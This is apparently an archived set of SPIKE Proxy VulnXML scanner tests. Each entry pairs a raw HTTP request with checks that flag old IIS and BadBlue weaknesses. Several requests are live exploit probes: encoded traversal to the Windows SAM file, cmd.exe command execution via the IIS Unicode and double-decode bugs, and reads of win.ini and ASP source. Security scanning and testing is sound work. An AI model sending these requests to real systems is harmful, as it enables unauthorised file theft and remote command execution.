found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-137.xml0100664000076500007650000000735007566204543017564 0ustar davedave (..%255c..%255c..%255c..%255c..%255c../windows/repair/sam) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1380.xml0100664000076500007650000000731407566204543017645 0ustar davedave (query.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/query.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1381.xml0100664000076500007650000000717207566204543017650 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1382.xml0100664000076500007650000000717207566204543017651 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1383.xml0100664000076500007650000000762407566204543017654 0ustar davedave (qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ This is the formatting page for webhits full highlighting 200 This is the formatting page for webhits full highlighting 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1384.xml0100664000076500007650000000763607566204543017660 0ustar davedave (qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ This is the formatting page for webhits summary highlighting\. 200 This is the formatting page for webhits summary highlighting\. 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1385.xml0100664000076500007650000000731407566204543017652 0ustar davedave (codebrws.asp) "IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ View Active Server Page Source 200 View Active Server Page Source 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1386.xml0100664000076500007650000000744207566204543017655 0ustar davedave (CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp) "CodeBrws.asp can be used to determine if a file system path exists or not." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Path not found 200 Path not found 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1387.xml0100664000076500007650000000736507566204543017662 0ustar davedave (CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp) "IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1388.xml0100664000076500007650000000716407566204543017660 0ustar davedave (tstisapi.dll) "The test tstisapi.dll is available and can allow attackers to execute commands remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /isapi/tstisapi.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Pi3web 200 Pi3web 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1389.xml0100664000076500007650000000715707566204543017663 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ISSamples/SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-138.xml0100664000076500007650000000734407566204543017570 0ustar davedave (..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1390.xml0100664000076500007650000000715707566204543017653 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ISSamples/sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1391.xml0100664000076500007650000000706007566204543017645 0ustar davedave (/) "Site Server sample files. This might be interresting." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /market/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1392.xml0100664000076500007650000000724707566204543017655 0ustar davedave (..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c) "Can issue arbitrary commands to host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [winnt] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} [winnt] spkproxy/VulnXML/SiteTests/sitetest-1393.xml0100664000076500007650000000703207566204543017646 0ustar davedave (msadcs.dll) "See RDS advisory 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /msadc/msadcs.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1394.xml0100664000076500007650000000712107566204543017646 0ustar davedave (samples/adctest.asp) "This may allow remote code execution on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /msadc/samples/adctest.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1395.xml0100664000076500007650000000734707566204543017661 0ustar davedave (showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini) "This allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1396.xml0100664000076500007650000000706307566204543017655 0ustar davedave (/) "Site Server sample files. This might be interresting." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mspress30/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1397.xml0100664000076500007650000000715707566204543017662 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /oc/Search/SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1398.xml0100664000076500007650000000715707566204543017663 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /oc/Search/sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1399.xml0100664000076500007650000000715207566204543017657 0ustar davedave (oaskill.exe?abcde.exe) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ows-bin/oaskill.exe?abcde.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-139.xml0100664000076500007650000000735007566204543017566 0ustar davedave (..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1400.xml0100664000076500007650000000720207566204543017632 0ustar davedave (oasnetconf.exe?-l%20-s%20BlahBlah) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1401.xml0100664000076500007650000000716607566204543017644 0ustar davedave (pbserver.dll) "This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pbserver/pbserver.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1402.xml0100664000076500007650000000706307566204543017641 0ustar davedave (/proxy/w3proxy.dll) "MSProxy v1.0 installed" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/proxy/w3proxy.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 502 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 502 spkproxy/VulnXML/SiteTests/sitetest-1403.xml0100664000076500007650000000721007566204543017634 0ustar davedave (..%255c..%255cwinnt/system32/cmd.exe?/c+ver) "IIS is vulnerable to a double-decode bug 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [Version] 200 [Version] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1404.xml0100664000076500007650000000725707566204543017650 0ustar davedave (..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\) "IIS Unicode problem... http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1405.xml0100664000076500007650000000705407566204543017644 0ustar davedave (counter.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/counter.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1406.xml0100664000076500007650000000705007566204543017641 0ustar davedave (cphost.dll) "This might be interresting" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/cphost.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1407.xml0100664000076500007650000000710607566204543017644 0ustar davedave (cpshost.dll) "posting acceptor...possibly allows you to upload files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/cpshost.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1408.xml0100664000076500007650000000705607566204543017651 0ustar davedave (fpadmcgi.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/fpadmcgi.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1409.xml0100664000076500007650000000711707566204543017650 0ustar davedave (iisadmin/ism.dll) "allows you to mount a brute force attack on passwords" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/iisadmin/ism.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-140.xml0100664000076500007650000000732407566204543017557 0ustar davedave (..%2F..%2F..%2F..%2F..%2F../windows/repair/sam) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1410.xml0100664000076500007650000000716707566204543017645 0ustar davedave (no-such-file.pl) "Using perl.exe allows attacker to view host info. Use perlis.dll instead." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/no-such-file.pl HTTP/1.0 The 